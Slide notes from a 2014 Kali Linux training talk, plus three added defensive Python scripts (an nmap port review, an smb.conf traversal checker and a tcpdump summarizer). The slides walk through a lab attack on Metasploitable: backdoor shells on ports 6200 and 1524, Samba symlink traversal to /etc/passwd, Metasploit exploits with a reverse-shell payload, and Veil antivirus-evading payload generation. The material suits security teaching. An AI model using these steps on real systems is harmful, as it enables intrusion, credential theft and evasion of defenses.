Kali Linux - Falconer

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

Slide notes:
  • Presentation on Kali Linux – T. Godfrey, Falconer Technologies – Ohio HTCIA Salt Fork conference – 5/2014
  • http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.html
    http://www.hacking-tutorial.com/
    http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/
    http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/
    http://efytimes.com/e1/fullnews.asp?edid=121888
  • https://pentest-tools.com/home
    http://www.softwaretestinghelp.com/penetration-testing-tools/
    https://pentestmag.com/
    http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/
    http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/
    https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/
    http://www.security-audit.com/blog/penetration-testing-tools/
    http://www.bulbsecurity.com/smartphone-pentest-framework/
  • http://kali4hackers.blogspot.com/
    http://www.hackingwithkalilinux.tk/2013/08/kali-linux.html
    http://www.youtube.com/watch?v=3OM22HqvX14
    http://www.kalilinux.net/community/threads/custome-command-prompt.243/
    http://hackwithkalilinux.blogspot.com/
    http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_tech
    http://www.markdubois.info/weblog/2014/02/kali-linux/
    http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.html
    http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/
    http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.html
    http://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  • http://docs.kali.org/pdf/kali-book-en.pdf
    https://eforensicsmag.com/from-backtrack-to-kalilinux/
    http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&qid=1399928840&sr=8-1&keywords=kali+linux
    http://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&qid=1399928876&sr=8-2&keywords=kali+linux
  • https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
    https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/
    http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/
    http://www.concise-courses.com/security/50-firefox-pentesting-addons/

    1. Kali Linux: Presentation on Kali Linux, Ohio HTCIA 2014 Spring Conference, Salt Fork Lodge
    2. Welcome – Salt Fork 2014
    3. Welcome: Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est. 2003), specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nationwide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
    4. Who or What is 'Kali'?
    5. Who is Kali? "Kali the mother goddess, despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities, her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!" – Anu Yadavalli
    6. Hindu Kali
    7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
    8. What's on the DVD? /books ◦ Official Kali Guide ◦ eForensics; /media ◦ 7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager; /metasploitable; /PPT
    9. http://www.kali.org/
    10. Legend (icons used on the slides): "We're going to type something", "We're going to make a note", "Might be a question?", "We're going to click on something", "Recon", "Attack"
    11. Ready?
    12. Use your powers for good
    13. Getting Ready… ◦ Let's make a folder called kali_2014 ◦ Copy the DVD contents into that folder ◦ Install 7-Zip ◦ Install VMware Player. Let's make sure the virtual environments are working and can 'ping' each other.
    14. VMware Player: Press <Ctrl><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
    15. Logins / Passwords ◦ Kali login: root ◦ Kali password: password ◦ Metasploitable login: msfadmin ◦ Metasploitable password: msfadmin
    16. Metasploitable V/E ◦ Login: msfadmin ◦ Password: msfadmin ◦ ifconfig (jot down the IP & netmask) ◦ route (jot down the gateway)
    17. Metasploitable V/E: Virtual Environment #1 (Metasploitable). Go to TERMINAL: ◦ rlogin -l root <IP Address> ◦ cd /tmp ◦ ls -l ...vs... ls -la ◦ rm .X0-lock ◦ startx
    18. Kali V/E ◦ Login: root ◦ Password: password ◦ ifconfig (jot down the IP & netmask) ◦ route (jot down the gateway)
    19. Kali V/E: Go to Applications → System Tools → Preferences → System Settings → Display → Resolution: ____ Then… [Apply]
    20. Kali Updating: From the command line, type apt-get update && apt-get upgrade. Note: This has already been done to save time, but should be done after a new installation.
    21. Are we good?
    22. There are several categories: Top 10 Security Tools, Information Gathering, Vulnerability Analysis, Web Applications, Password Attacks, Wireless Attacks, Exploitation Tools, Sniffing/Spoofing, Maintaining Access, Reverse Engineering, Stress Testing, Hardware Hacking, Forensics, Reporting Tools, System Services
    23. Metapackages also exist
    24. Command Line Tools – Presentation on Kali Linux
    25. ping: Packet InterNet Groper (ICMP echo request, type 8). Confirms that two entities can reach each other over the network. (from Kali) ping <Target IP> – Did it echo back?
    26. top: Tells us what services are running, processes, memory allocation. Basically, a live system monitor.
    27. df: Tells us how much space is available, or 'disk free'.
    28. du: Tells us how much space is taken, or 'disk used'. You can get a shorter report with du -s (disk used, summary).
    29. free: How much 'free' memory is available
    30. ls: This is for 'list'. ls -l (list, long format); ls -la (list, long format, all entries including hidden dot-files)
    31. pwd: Directory structure. Means 'print working directory' (or 'path to working directory').
    32. ps / ps aux / pstree: ps means 'process status' ◦ aux – all users' processes in user-oriented format, including those without a terminal ◦ pstree – shows parent/child relationships ◦ Windows equivalents: tasklist / taskkill. kill – stops a process (ex: kill PID)
    33. Both Environments – Presentation on Kali Linux
    34. Can you 'ping' each other? Virtual Environment #1 (Metasploitable) ◦ Go to TERMINAL ◦ ifconfig ◦ …jot this number down… Virtual Environment #2 (Kali) ◦ Go to TERMINAL ◦ ifconfig ◦ …jot this number down…
    35. CLI & Services – Presentation on Kali Linux
    36. traceroute: Essentially 'tracert' in Windows. traceroute -i eth0 <Target IP>. It displays the route (path) and measures transit delays of packets across an Internet Protocol (IP) network.
    37. nmap: nmap -p0-65535 <Target IP> | less. A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network.
    38. nmap: nmap -sS -Pn -A <Target IP>. A security scanner used to discover hosts and services on a computer network: '-sS' is the SYN ("stealth") scan, '-Pn' skips the ping (host-discovery) scan, and '-A' is OS detection, services and service pack.
    39. rlogin (from Metasploitable) ◦ rlogin -l root <Target IP> ◦ whoami ◦ tcpdump -i eth0 host <Target IP>. tcpdump is a packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
    40. rpcinfo: rpcinfo -p <Target IP>. A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
    41. showmount ◦ showmount -e <Target IP> (export list) ◦ showmount -a <Target IP>. It displays a list of all clients that have remotely mounted a file system from the specified machine (the Host parameter). This information is maintained by the mountd daemon on the Host.
    42. telnet: telnet <Target IP> 21. After '220...': user backdoored:) then <Ctrl><]> and quit. Port 20/21 is FTP.
    43. telnet: telnet <Target IP> 6200. After 'Escape character...': id; then <Ctrl><]> and quit. Port 6200 – Oracle Notification Service remote port, Oracle Application Server.
    44. telnet: telnet <Target IP> 6667. IRC (Internet Relay Chat). Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
    45. telnet: telnet <Target IP> 1524. After 'root@meta....': id. Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
    46. Are we good?
    47. smbclient ◦ smbclient -L //<Target IP> ◦ msfconsole (...wait, wait, wait...), then ◦ use auxiliary/admin/smb/samba_symlink_traversal ◦ set RHOST <Target IP> ◦ set SMBSHARE tmp
    48. smbclient ◦ exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type exit
    49. smbclient ◦ smbclient //<Target IP>/tmp – Do you get the 'smb: \>' prompt? ◦ cd rootfs ◦ cd etc ◦ more passwd – Do you get a list of all user accounts?
    50. tcpdump: On Kali… tcpdump -i eth0 src <Target IP>. On Metasploitable… ping www.yahoo.com, then open a browser & go to CNN.com
    51. netdiscover: On Kali: netdiscover -i eth0 -r <Target IP>/24. Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without a DHCP server, when you are wardriving. It can also be used on hub/switched networks.
    52. nikto: On Kali: nikto -h <Target IP>. It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers.
    53. sqlmap: On Kali: sqlmap -u http://<Target IP> --dbs. It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
    54. Wasp Services: From Kali, open Iceweasel: http://<Target IP>/ Research: Mutillidae <p. 8>. The Mutillidae are a family of more than 3,000 species of wasps (despite the name) whose wingless females resemble large, hairy ants. Their common name 'velvet ant' refers to their dense pile of hair, which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
    55. Web Services: From Kali, open Iceweasel: http://<Target IP>/ Research: Mutillidae <p. 8>. Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application.
    56. whatweb: From Kali ◦ whatweb <Target IP> ◦ whatweb -v <Target IP> ◦ whatweb -a 4 <Target IP>. WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
    57. From Kali – msfconsole – Presentation on Kali Linux
    58. msfconsole: From Kali ◦ service postgresql start ◦ service metasploit start ◦ msfconsole. Let's fire up the database (PostgreSQL), start Metasploit, then start msfconsole. We will then take a look at the built-in exploit tools.
    59. msfconsole: From the [msf >] console ◦ help search ◦ show exploits ◦ search dns. 'help search' shows all of the options, 'show exploits' shows all the built-in exploits in msfconsole, 'search dns' will look for any DNS exploits.
    60. msfconsole: From the [msf >] console ◦ search Microsoft ◦ search diablo ◦ search irc ◦ search http. Let's try a few more to see what they do….
    61. msfconsole: From the [msf >] console, search for 'unreal' ◦ info <exploit> ◦ use <exploit> ◦ show options ◦ LHOST, RHOST, LPORT, RPORT
    62. msfconsole: From the [msf >] console (ex: unreal) ◦ set RHOST <IP Address> ◦ show options ◦ exploit
    63. msfconsole: From the [msf >] console, search for 'twiki' ◦ info <exploit> ◦ use <exploit> ◦ show options ◦ LHOST, RHOST, LPORT, RPORT
    64. msfconsole: From the [msf >] console (ex: 'twiki') ◦ set RHOST <IP Address> ◦ show options ◦ exploit
    65. msfconsole: From the [msf >] console (target: Win XP) ◦ use exploit/windows/smb/ms08_067_netapi ◦ show options ◦ show targets ◦ set target 2
    66. msfconsole: From the [msf >] console (target: Win XP) ◦ show options ◦ show advanced ◦ show targets ◦ show payloads
    67. msfconsole: From the [msf >] console (target: Win XP) ◦ set payload windows/shell_reverse_tcp ◦ show options ◦ set LHOST <Kali IP Address> ◦ set RHOST <Target IP Address>
    68. msfconsole: From the [msf >] console (target: Win XP) ◦ show options ◦ exploit. Any errors?
    69. From Kali – more GUI – Presentation on Kali Linux
    70. Zenmap: Let's run Zenmap. Applications → Kali Linux → Information Gathering → DNS Analysis → Zenmap
    71. SHODAN: Let's run SHODAN. Open a browser, go to www.shodanhq.com, type in 'almost anything' …Be very nervous…
    72. FERN: Let's run FERN. Kali Linux → Wireless Attacks → Wireless Tools → fern-wifi-cracker
    73. recon-ng: Kali has many built-in tools, but you can always install more (Debian-based); you may wish to add more, such as recon-ng. recon-ng: automated information gathering and network reconnaissance.
    74. recon-ng: Let's run recon-ng… ◦ cd /opt/recon-ng ◦ /usr/bin/python recon-ng ◦ show modules ◦ recon/hosts/gather/http/web/google_site
    75. recon-ng: Let's run recon-ng… ◦ set DOMAIN <domain.com> ◦ run (…let this run awhile…) ◦ back (…previous level…) ◦ show modules
    76. recon-ng: Let's run recon-ng… ◦ use reporting/csv ◦ run. This will add your new information to /usr/share/recon-ng/workspaces/default
    77. dmitry: If you want something more basic… dmitry. dmitry -s <domain.com>. It gives you site names & IPs.
    78. veil: Kali has many built-in tools, but you can always install even more (Debian-based); you may wish to add more, such as veil. veil: remote shell payload generator that can bypass many anti-virus programs.
    79. veil: Let's run veil ◦ veil-evasion ◦ list (available payloads list) ◦ use 13 (powershell/VirtualAlloc) ◦ generate
    80. veil: Let's run veil ◦ 1 (msfvenom) ◦ [ENTER] (accept default) ◦ Value for LHOST (Target IP) ◦ Value for LPORT (ex: 4000)
    81. veil: Let's run veil ◦ Output name ("Squatch"). It will store this new batch file in the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
    82. Final Thoughts…
    83. Kali Information: See 'Notes' section in this slide
    84. Kali Comparisons: See 'Notes' section in this slide
    85. Kali-specific Websites: See 'Notes' section in this slide
    86. Kali Publications: See 'Notes' section in this slide
    87. Questions/Concerns
    88. But wait, that's not all
    89. Kali in a box? Do you want to run Kali on a tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
    90. Pentesting with Firefox? The Firefox web browser is a great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version; install the needed plugins, then fire up the browser and 'use your powers for good'.
    91. Thank You
    92. Thank you: Thank you for your time. Falconer Technologies, TonyGodfrey@FalconerTechnologies.com, 877 / TUX RULZ or 877 / 889-7859
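Slides 37 to 45 scan the lab host with nmap and then probe individual listening ports by hand. Seen from the owner of the host, the same scan output is an inventory to review: which ports are open, and which of them nobody expects. The script below is an added example, not code from the presentation: it parses nmap's grepable (-oG) output, compares the open ports against an allowlist of expected services, and annotates the ports the slides single out (21, 1524, 6200 and 6667). The scan line, the allowlist and the annotations are constructed for the example.

```python
"""Review nmap grepable (-oG) output against an allowlist of expected services.

Added example, not from the presentation. SAMPLE_OG is a constructed
'Host:' line in nmap's grepable format; ALLOWLIST and FLAGGED_PORTS are
assumptions chosen for illustration.
"""
import re
from collections import namedtuple

OpenPort = namedtuple("OpenPort", "host port proto service version")

# Constructed: one 'Host:' line as nmap -oG writes it. Field order inside each
# port entry is port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_OG = (
    "Host: 192.168.56.101 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X/, "
    "1524/open/tcp//ingreslock?///, "
    "6200/open/tcp//unknown///, "
    "6667/open/tcp//irc//UnrealIRCd/"
    "\tIgnored State: closed (65530)"
)

# Ports the slides single out as backdoor or high-risk listeners (slides 42-45).
FLAGGED_PORTS = {
    21: "FTP; the lab host's FTP daemon carries a backdoor (slide 42)",
    1524: "ingreslock; attack scripts install a backdoor shell here (slide 45)",
    6200: "the lab host's backdoor shell listener (slide 43)",
    6667: "IRC; many trojans/backdoors also use this port (slide 44)",
}

# Services the asset owner expects on this host (assumption for the example).
ALLOWLIST = {22, 139}

# port / state / protocol / owner / service / rpcinfo / version /
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return an OpenPort for every port a -oG 'Host:' line reports as open."""
    found = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines, and hosts with no ports listed
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service, version.strip()))
    return found


def review(open_ports, allowlist=ALLOWLIST, flagged=FLAGGED_PORTS):
    """Return (unexpected, notes): open ports outside the allowlist, and a
    {port: reason} map for the ones on the flagged list."""
    unexpected = [p for p in open_ports if p.port not in allowlist]
    notes = {p.port: flagged[p.port] for p in open_ports if p.port in flagged}
    return unexpected, notes


if __name__ == "__main__":
    ports = parse_grepable(SAMPLE_OG)
    unexpected, notes = review(ports)
    for p in unexpected:
        print(f"{p.host}:{p.port}/{p.proto} {p.service} {p.version}".rstrip())
        if p.port in notes:
            print(f"    note: {notes[p.port]}")
```

Feeding it a real scan is `nmap -p0-65535 -oG scan.gnmap <host>` followed by `parse_grepable(open("scan.gnmap").read())`; the allowlist is the part worth maintaining per host, because every open port that is not on it is either undocumented or unwanted.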
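The samba_symlink_traversal module on slides 47 to 49 reaches /etc/passwd through the tmp share only because the share's Samba configuration lets a symlink inside the share point anywhere on the filesystem; in smb.conf that is the 'wide links' setting, which Samba forces off when 'unix extensions' is on unless the global 'allow insecure wide links' has also been set. The check below is an added example, not code from the presentation or from Samba: a minimal smb.conf reader that lists shares where such traversal is possible, run against a constructed weak configuration and a hardened one.

```python
"""Flag Samba shares whose configuration permits symlink traversal outside the share.

Added example, not from the presentation or from Samba. WEAK_CONF and
HARDENED_CONF are constructed smb.conf fragments; parse_smb_conf is a
minimal reader sufficient for this check, not a full smb.conf parser.
"""

# Constructed: the kind of share the symlink traversal module needs.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   unix extensions = no

[tmp]
   path = /tmp
   writeable = yes
   guest ok = yes
   wide links = yes
   follow symlinks = yes
"""

# Constructed: the same share with symlinks kept inside the share (or not followed at all).
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   unix extensions = yes
   wide links = no

[tmp]
   path = /tmp
   writeable = yes
   guest ok = no
   follow symlinks = no
"""


def _truthy(value):
    """smb.conf booleans: yes/true/1 (case-insensitive) are on."""
    return value.strip().lower() in ("yes", "true", "1")


def parse_smb_conf(text):
    """Return {section: {key: value}}; keys lower-cased, comments (#, ;) skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def effective(sections, share, key, default):
    """Per-share value, falling back to [global], then to Samba's default."""
    if key in sections.get(share, {}):
        return sections[share][key]
    return sections.get("global", {}).get(key, default)


def symlink_traversal_risk(text):
    """List shares where a symlink inside the share can lead a client outside it.

    Samba follows a symlink that points outside the share only when 'wide links'
    is on. 'follow symlinks = no' stops symlink following entirely, and Samba
    forces wide links off when 'unix extensions' is on (the modern default)
    unless the global 'allow insecure wide links' has been set as well.
    """
    sections = parse_smb_conf(text)
    glob = sections.get("global", {})
    unix_ext = _truthy(glob.get("unix extensions", "yes"))
    insecure = _truthy(glob.get("allow insecure wide links", "no"))
    risky = []
    for share in sections:
        if share == "global":
            continue
        follow = _truthy(effective(sections, share, "follow symlinks", "yes"))
        wide = _truthy(effective(sections, share, "wide links", "no"))
        if follow and wide and (not unix_ext or insecure):
            risky.append(share)
    return risky


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: shares open to symlink traversal -> {symlink_traversal_risk(conf)}")
```

The hardened fragment also drops `guest ok`, which is independent of the traversal setting but is what lets the slide's anonymous smbclient session get to the share in the first place.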
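Slide 50 watches the Metasploitable host's outbound traffic from Kali with tcpdump while the host pings and browses. The script below is an added example, not from the presentation: it reads tcpdump text output of that kind and summarizes what the monitored host did (DNS names looked up, ICMP echo targets, TCP connections attempted), which is the view a defender wants from a capture of a suspect host. The capture lines are constructed and use TEST-NET placeholder addresses; the monitored address is an assumption.

```python
"""Summarize a host's outbound activity from tcpdump text output.

Added example, not from the presentation. SAMPLE_TCPDUMP is constructed to
look like 'tcpdump -i eth0 src 192.168.56.101'; 203.0.113.x are TEST-NET
placeholders, not the real addresses of the sites named on the slide.
"""
import re

SAMPLE_TCPDUMP = """\
12:00:01.000100 IP 192.168.56.101.33000 > 192.168.56.1.53: 4321+ A? www.yahoo.com. (31)
12:00:01.020000 IP 192.168.56.101 > 203.0.113.10: ICMP echo request, id 1, seq 1, length 64
12:00:02.020000 IP 192.168.56.101 > 203.0.113.10: ICMP echo request, id 1, seq 2, length 64
12:00:05.000000 IP 192.168.56.101.33001 > 192.168.56.1.53: 4322+ A? www.cnn.com. (29)
12:00:05.100000 IP 192.168.56.101.51000 > 203.0.113.20.80: Flags [S], seq 10, win 5840, length 0
12:00:05.300000 IP 192.168.56.101.51000 > 203.0.113.20.80: Flags [P.], seq 1:300, ack 1, win 5840, length 299
"""

# timestamp, 'IP', source endpoint, '>', destination endpoint up to the colon, rest of line
LINE_RE = re.compile(r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>[^:]+): (?P<rest>.*)$")


def split_host_port(endpoint):
    """'203.0.113.20.80' -> ('203.0.113.20', 80); a bare address -> (addr, None)."""
    head, _, tail = endpoint.rpartition(".")
    if tail.isdigit() and head.count(".") == 3:
        return head, int(tail)
    return endpoint, None


def summarize(capture, target="192.168.56.101"):
    """Return {'dns': [names], 'icmp': [hosts], 'tcp_syn': [(host, port)]}
    for packets the monitored target sent."""
    summary = {"dns": [], "icmp": [], "tcp_syn": []}
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tcpdump banner lines, ARP, truncated lines
        src, _ = split_host_port(m["src"])
        if src != target:
            continue
        dst, dport = split_host_port(m["dst"])
        rest = m["rest"]
        if dport == 53 and "? " in rest:
            # '4321+ A? www.yahoo.com. (31)' -> queried name without the trailing dot
            summary["dns"].append(rest.split("? ", 1)[1].split()[0].rstrip("."))
        elif rest.startswith("ICMP echo request"):
            if dst not in summary["icmp"]:
                summary["icmp"].append(dst)
        elif rest.startswith("Flags [S]"):
            summary["tcp_syn"].append((dst, dport))  # connection attempts only, not data
    return summary


if __name__ == "__main__":
    for kind, items in summarize(SAMPLE_TCPDUMP).items():
        print(f"{kind}: {items}")
```

Only SYN packets are counted as connections, so the later data segment on the same flow does not inflate the tally; a live capture is fed in with `summarize(open("capture.txt").read(), target=<Target IP>)`.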